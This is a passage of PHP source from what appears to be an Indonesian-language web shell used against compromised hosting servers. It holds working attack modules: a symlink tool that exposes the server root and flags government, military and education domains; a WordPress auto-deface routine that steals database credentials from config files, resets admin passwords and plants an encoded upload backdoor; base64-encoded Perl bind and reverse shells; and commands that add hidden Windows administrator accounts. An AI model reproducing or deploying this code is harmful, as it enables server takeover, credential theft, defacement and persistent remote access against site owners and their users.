  2276.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  2277.             }
  2278.         }
  2279.     } else {
  2280.         echo "<center><form method='post'>
  2281.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  2282.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  2283.         Domain: <br>
  2284.         <textarea style='width: 450px; height: 250px;' name='url'>";
  2285.         reverse($_SERVER['HTTP_HOST']);
  2286.         echo "</textarea><br>
  2287.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  2288.         </form><br>
  2289.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  2290.     }
  2291. } elseif($_GET['do'] == 'symlink') {
  2292.  
  2293. @set_time_limit(0);
  2294.  
  2295. echo "<br><br><center><h1>+--=[ Symlink ]=--+</h1></center><br><br><center><div class=content>";
  2296.  
  2297. @mkdir('sym',0777);
  2298. $htaccess  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  2299. $write =@fopen ('sym/.htaccess','w');
  2300. fwrite($write ,$htaccess);
  2301. @symlink('/','sym/root');
  2302. $filelocation = basename(__FILE__);
  2303. $read_named_conf = @file('/etc/named.conf');
  2304. if(!$read_named_conf)
  2305. {
  2306. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  2307. }
  2308. else
  2309. {
  2310. echo "<br><br><div class='tmp'><table border='1' bordercolor='#00ff00' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
  2311. foreach($read_named_conf as $subject){
  2312. if(eregi('zone',$subject)){
  2313. preg_match_all('#zone "(.*)"#',$subject,$string);
  2314. flush();
  2315. if(strlen(trim($string[1][0])) >2){
  2316. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  2317. $name = $UID['name'] ;
  2318. @symlink('/','sym/root');
  2319. $name   = $string[1][0];
  2320. $iran   = '\.ir';
  2321. $israel = '\.il';
  2322. $indo   = '\.id';
  2323. $sg12   = '\.sg';
  2324. $edu    = '\.edu';
  2325. $gov    = '\.gov';
  2326. $gose   = '\.go';
  2327. $gober  = '\.gob';
  2328. $mil1   = '\.mil';
  2329. $mil2   = '\.mi';
  2330. $malay  = '\.my';
  2331. $china  = '\.cn';
  2332. $japan  = '\.jp';
  2333. $austr  = '\.au';
  2334. $porn   = '\.xxx';
  2335. $as     = '\.uk';
  2336. $calfn  = '\.ca';
  2337.  
  2338. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
  2339. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])
  2340. or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])
  2341. or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0]))
  2342. {
  2343. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
  2344. }
  2345. echo "
  2346. <tr>
  2347.  
  2348. <td>
  2349. <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
  2350. </td>
  2351.  
  2352. <td>
  2353. '.$UID['name']."
  2354. </td>
  2355.  
  2356. <td>
  2357. <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
  2358. </td>
  2359.  
  2360. </tr></div> ";
  2361. flush();
  2362. }
  2363. }
  2364. }
  2365. }
  2366.  
  2367. echo "</center></table>";  
  2368.  
  2369. }  
  2370.  elseif($_GET['do'] == 'adminer') {
  2371.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2372.     function adminer($url, $isi) {
  2373.         $fp = fopen($isi, "w");
  2374.         $ch = curl_init();
  2375.               curl_setopt($ch, CURLOPT_URL, $url);
  2376.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  2377.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2378.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  2379.               curl_setopt($ch, CURLOPT_FILE, $fp);
  2380.         return curl_exec($ch);
  2381.               curl_close($ch);
  2382.         fclose($fp);
  2383.         ob_flush();
  2384.         flush();
  2385.     }
  2386.     if(file_exists('adminer.php')) {
  2387.         echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2388.     } else {
  2389.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  2390.             echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2391.         } else {
  2392.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  2393.         }
  2394.     }
  2395. } elseif($_GET['do'] == 'auto_dwp') {
  2396.     if($_POST['auto_deface_wp']) {
  2397.         function anucurl($sites) {
  2398.             $ch = curl_init($sites);
  2399.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2400.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2401.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2402.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2403.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2404.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2405.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2406.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2407.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2408.             $data = curl_exec($ch);
  2409.                   curl_close($ch);
  2410.             return $data;
  2411.         }
  2412.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  2413.             $post = array(
  2414.                    "log" => "$userr",
  2415.                    "pwd" => "$pass",
  2416.                    "rememberme" => "forever",
  2417.                    "wp-submit" => "$wp_submit",
  2418.                    "redirect_to" => "$web",
  2419.                    "testcookie" => "1",
  2420.                    );
  2421.             $ch = curl_init($cek);
  2422.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2423.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2424.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2425.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2426.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2427.                   curl_setopt($ch, CURLOPT_POST, 1);
  2428.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  2429.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2430.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2431.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2432.             $data = curl_exec($ch);
  2433.                   curl_close($ch);
  2434.             return $data;
  2435.         }
  2436.         $scan = $_POST['link_config'];
  2437.         $link_config = scandir($scan);
  2438.         $script = htmlspecialchars($_POST['script']);
  2439.         $user = "global";
  2440.         $pass = "global";
  2441.         $passx = md5($pass);
  2442.         foreach($link_config as $dir_config) {
  2443.             if(!is_file("$scan/$dir_config")) continue;
  2444.             $config = file_get_contents("$scan/$dir_config");
  2445.             if(preg_match("/WordPress/", $config)) {
  2446.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  2447.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  2448.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2449.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  2450.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2451.                 $prefix = $dbprefix."users";
  2452.                 $option = $dbprefix."options";
  2453.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2454.                 $db = mysql_select_db($dbname);
  2455.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2456.                 $result = mysql_fetch_array($q);
  2457.                 $id = $result[ID];
  2458.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2459.                 $result2 = mysql_fetch_array($q2);
  2460.                 $target = $result2[option_value];
  2461.                 if($target == '') {                
  2462.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2463.                 } else {
  2464.                     echo "[+] $target <br>";
  2465.                 }
  2466.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  2467.                 if(!$conn OR !$db OR !$update) {
  2468.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  2469.                     mysql_close($conn);
  2470.                 } else {
  2471.                     $site = "$target/wp-login.php";
  2472.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  2473.                     $b1 = anucurl($site2);
  2474.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  2475.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  2476.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  2477.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  2478.                     $www = "m.php";
  2479.                     $fp5 = fopen($www,"w");
  2480.                     fputs($fp5,$upload3);
  2481.                     $post2 = array(
  2482.                             "_wpnonce" => "$anu2",
  2483.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  2484.                             "themezip" => "@$www",
  2485.                             "install-theme-submit" => "Install Now",
  2486.                             );
  2487.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  2488.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2489.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2490.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2491.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2492.                           curl_setopt($ch, CURLOPT_POST, 1);
  2493.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2494.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2495.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2496.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2497.                     $data3 = curl_exec($ch);
  2498.                           curl_close($ch);
  2499.                     $y = date("Y");
  2500.                     $m = date("m");
  2501.                     $namafile = "id.php";
  2502.                     $fpi = fopen($namafile,"w");
  2503.                     fputs($fpi,$script);
  2504.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2505.                            curl_setopt($ch6, CURLOPT_POST, true);
  2506.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2507.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2508.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2509.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2510.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  2511.                     $postResult = curl_exec($ch6);
  2512.                            curl_close($ch6);
  2513.                     $as = "$target/k.php";
  2514.                     $bs = anucurl($as);
  2515.                     if(preg_match("#$script#is", $bs)) {
  2516.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  2517.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2518.                         } else {
  2519.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
  2520.                         echo "[!!] coba aja manual: <br>";
  2521.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2522.                         echo "[+] username: <font color=lime>$user</font><br>";
  2523.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
  2524.                         }
  2525.                     mysql_close($conn);
  2526.                 }
  2527.             }
  2528.         }
  2529.     } else {
  2530.         echo "<center><h1>WordPress Auto Deface</h1>
  2531.         <form method='post'>
  2532.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  2533.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by Crystalesia' required><br>
  2534.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2535.         </form>
  2536.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  2537.         </center>";
  2538.     }
  2539. } elseif($_GET['do'] == 'network') {
  2540.     echo "<form method='post'>
  2541.     <u>Bind Port:</u> <br>
  2542.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  2543.     <input type='submit' name='sub_bp' value='>>'>
  2544.     </form>
  2545.     <form method='post'>
  2546.     <u>Back Connect:</u> <br>
  2547.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  2548.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  2549.     <input type='submit' name='sub_bc' value='>>'>
  2550.     </form>";
  2551.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  2552.     if(isset($_POST['sub_bp'])) {
  2553.         $f_bp = fopen("/tmp/bp.pl", "w");
  2554.         fwrite($f_bp, base64_decode($bind_port_p));
  2555.         fclose($f_bp);
  2556.  
  2557.         $port = $_POST['port_bind'];
  2558.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  2559.         sleep(1);
  2560.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  2561.         unlink("/tmp/bp.pl");
  2562.     }
  2563.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  2564.     if(isset($_POST['sub_bc'])) {
  2565.         $f_bc = fopen("/tmp/bc.pl", "w");
  2566.         fwrite($f_bc, base64_decode($bind_connect_p));
  2567.         fclose($f_bc);
  2568.  
  2569.         $ipbc = $_POST['ip_bc'];
  2570.         $port = $_POST['port_bc'];
  2571.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  2572.         sleep(1);
  2573.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  2574.         unlink("/tmp/bc.pl");
  2575.     }
  2576. } elseif($_GET['do'] == 'krdp_shell') {
  2577.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  2578.         if($_POST['create']) {
  2579.             $user = htmlspecialchars($_POST['user']);
  2580.             $pass = htmlspecialchars($_POST['pass']);
  2581.             if(preg_match("/$user/", exe("net user"))) {
  2582.                 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  2583.             } else {
  2584.                 $add_user   = exe("net user $user $pass /add");
  2585.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  2586.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  2587.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  2588.                 echo "[ RDP ACCOUNT INFO ]<br>
  2589.                 ------------------------------<br>
  2590.                 IP: <font color=lime>".$ip."</font><br>
  2591.                 Username: <font color=lime>$user</font><br>
  2592.                 Password: <font color=lime>$pass</font><br>
  2593.                 ------------------------------<br><br>
  2594.                 [ STATUS ]<br>
  2595.                 ------------------------------<br>
  2596.                 ";
  2597.                 if($add_user) {
  2598.                     echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  2599.                 } else {
  2600.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
  2601.                 }
  2602.                 if($add_groups1) {
  2603.                     echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  2604.                 } elseif($add_groups2) {
  2605.                     echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  2606.                 } elseif($add_groups3) {
  2607.                     echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  2608.                 } else {
  2609.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  2610.                 }
  2611.                 echo "------------------------------<br>";
  2612.             }
  2613.         } elseif($_POST['s_opsi']) {
  2614.             $user = htmlspecialchars($_POST['r_user']);
  2615.             if($_POST['opsi'] == '1') {
  2616.                 $cek = exe("net user $user");
  2617.                 echo "Checking username <font color=lime>$user</font> ....... ";
  2618.                 if(preg_match("/$user/", $cek)) {
  2619.                     echo "[ <font color=lime>Sudah ada</font> ]<br>
  2620.                     ------------------------------<br><br>
  2621.                     <pre>$cek</pre>";
  2622.                 } else {
  2623.                     echo "[ <font color=red>belum ada</font> ]";
  2624.                 }
  2625.             } elseif($_POST['opsi'] == '2') {
  2626.                 $cek = exe("net user $user global");
  2627.                 if(preg_match("/$user/", exe("net user"))) {
  2628.                     echo "[change password: <font color=lime>global</font>] -> ";
  2629.                     if($cek) {
  2630.                         echo "<font color=lime>Berhasil</font>";
  2631.                     } else {
  2632.                         echo "<font color=red>Gagal</font>";
  2633.                     }
  2634.                 } else {
  2635.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  2636.                 }
  2637.             } elseif($_POST['opsi'] == '3') {
  2638.                 $cek = exe("net user $user /DELETE");
  2639.                 if(preg_match("/$user/", exe("net user"))) {
  2640.                     echo "[remove user: <font color=lime>$user</font>] -> ";
  2641.                     if($cek) {
  2642.                         echo "<font color=lime>Berhasil</font>";
  2643.                     } else {
  2644.                         echo "<font color=red>Gagal</font>";
  2645.                     }
  2646.                 } else {
  2647.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  2648.                 }
  2649.             } else {
  2650.                 //
  2651.             }
  2652.         } else {
  2653.             echo "-- Create RDP --<br>
  2654.             <form method='post'>
  2655.             <input type='text' name='user' placeholder='username' value='global' required>
  2656.             <input type='text' name='pass' placeholder='password' value='global' required>
  2657.             <input type='submit' name='create' value='>>'>
  2658.             </form>
  2659.             -- Option --<br>
  2660.             <form method='post'>
  2661.             <input type='text' name='r_user' placeholder='username' required>
  2662.             <select name='opsi'>
  2663.             <option value='1'>Cek Username</option>
  2664.             <option value='2'>Ubah Password</option>
  2665.             <option value='3'>Hapus Username</option>
  2666.             </select>
  2667.             <input type='submit' name='s_opsi' value='>>'>
  2668.             </form>
  2669.             ";
  2670.         }
  2671.     } else {
  2672.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  2673.     }
  2674. } elseif($_GET['act'] == 'newfile') {
  2675.     if($_POST['new_save_file']) {
  2676.         $newfile = htmlspecialchars($_POST['newfile']);
  2677.         $fopen = fopen($newfile, "a+");
  2678.         if($fopen) {
  2679.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2680.         } else {
  2681.             $act = "<font color=red>permission denied</font>";
  2682.         }
  2683.     }
  2684.     echo $act;
  2685.     echo "<form method='post'>
  2686.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  2687.     <input type='submit' name='new_save_file' value='Submit'>
  2688.     </form>";
  2689. } elseif($_GET['act'] == 'newfolder') {
  2690.     if($_POST['new_save_folder']) {
  2691.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2692.         if(!mkdir($new_folder)) {
  2693.             $act = "<font color=red>permission denied</font>";
  2694.         } else {
  2695.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2696.         }
  2697.     }
  2698.     echo $act;
  2699.     echo "<form method='post'>
  2700.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2701.     <input type='submit' name='new_save_folder' value='Submit'>
  2702.     </form>";
  2703. } elseif($_GET['act'] == 'rename_dir') {
  2704.     if($_POST['dir_rename']) {
  2705.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2706.         if($dir_rename) {
  2707.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2708.         } else {
  2709.             $act = "<font color=red>permission denied</font>";
  2710.         }
  2711.     echo "".$act."<br>";
  2712.     }
  2713.     echo "<form method='post'>
  2714.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2715.     <input type='submit' name='dir_rename' value='rename'>
  2716.     </form>";
  2717. } elseif($_GET['act'] == 'delete_dir') {
  2718.     if(is_dir($dir)) {
  2719.         if(is_writable($dir)) {
  2720.             @rmdir($dir);
  2721.             @exe("rm -rf $dir");
  2722.             @exe("rmdir /s /q $dir");
  2723.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2724.         } else {
  2725.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2726.         }
  2727.     }
  2728.     echo $act;
  2729. } elseif($_GET['act'] == 'view') {
  2730.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2731.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2732. } elseif($_GET['act'] == 'edit') {
  2733.     if($_POST['save']) {
  2734.         $save = file_put_contents($_GET['file'], $_POST['src']);
  2735.         if($save) {
  2736.             $act = "<font color=lime>Saved!</font>";
  2737.         } else {
  2738.             $act = "<font color=red>permission denied</font>";
  2739.         }
  2740.     echo "".$act."<br>";
  2741.     }
  2742.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2743.     echo "<form method='post'>
  2744.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2745.     <input type='submit' value='Save' name='save' style='width: 500px;'>
  2746.     </form>";
  2747. } elseif($_GET['act'] == 'rename') {
  2748.     if($_POST['do_rename']) {
  2749.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2750.         if($rename) {
  2751.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2752.         } else {
  2753.             $act = "<font color=red>permission denied</font>";
  2754.         }
  2755.     echo "".$act."<br>";
  2756.     }
  2757.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2758.     echo "<form method='post'>
  2759.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2760.     <input type='submit' name='do_rename' value='rename'>
  2761.     </form>";
  2762. } elseif($_GET['act'] == 'delete') {
  2763.     $delete = unlink($_GET['file']);
  2764.     if($delete) {
  2765.         $act = "<script>window.location='?dir=".$dir."';</script>";
  2766.     } else {
  2767.         $act = "<font color=red>permission denied</font>";
  2768.     }
  2769.     echo $act;
  2770. } else {
  2771.     if(is_dir($dir) === true) {
  2772.         if(!is_readable($dir)) {
  2773.             echo "<font color=red>can't open directory. ( not readable )</font>";
  2774.         } else {
  2775.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2776.             <tr>
  2777.             <th class="th_home"><center>Name</center></th>
  2778.             <th class="th_home"><center>Type</center></th>
  2779.             <th class="th_home"><center>Size</center></th>
  2780.             <th class="th_home"><center>Last Modified</center></th>
  2781.             <th class="th_home"><center>Owner/Group</center></th>
  2782.             <th class="th_home"><center>Permission</center></th>
  2783.             <th class="th_home"><center>Action</center></th>
  2784.             </tr>';
  2785.             $scandir = scandir($dir);
  2786.             foreach($scandir as $dirx) {
  2787.                 $dtype = filetype("$dir/$dirx");
  2788.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2789.                 if(function_exists('posix_getpwuid')) {
  2790.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2791.                     $downer = $downer['name'];
  2792.                 } else {
  2793.                     //$downer = $uid;
  2794.                     $downer = fileowner("$dir/$dirx");
  2795.                 }
  2796.                 if(function_exists('posix_getgrgid')) {
  2797.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2798.                     $dgrp = $dgrp['name'];
  2799.                 } else {
  2800.                     $dgrp = filegroup("$dir/$dirx");
  2801.                 }
  2802.                 if(!is_dir("$dir/$dirx")) continue;
  2803.                 if($dirx === '..') {
  2804.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2805.                 } elseif($dirx === '.') {
  2806.                     $href = "<a href='?dir=$dir'>$dirx</a>";
  2807.                 } else {
  2808.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2809.                 }
  2810.                 if($dirx === '.' || $dirx === '..') {
  2811.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2812.                     } else {
  2813.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2814.                 }
  2815.                 echo "<tr>";
  2816.                 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
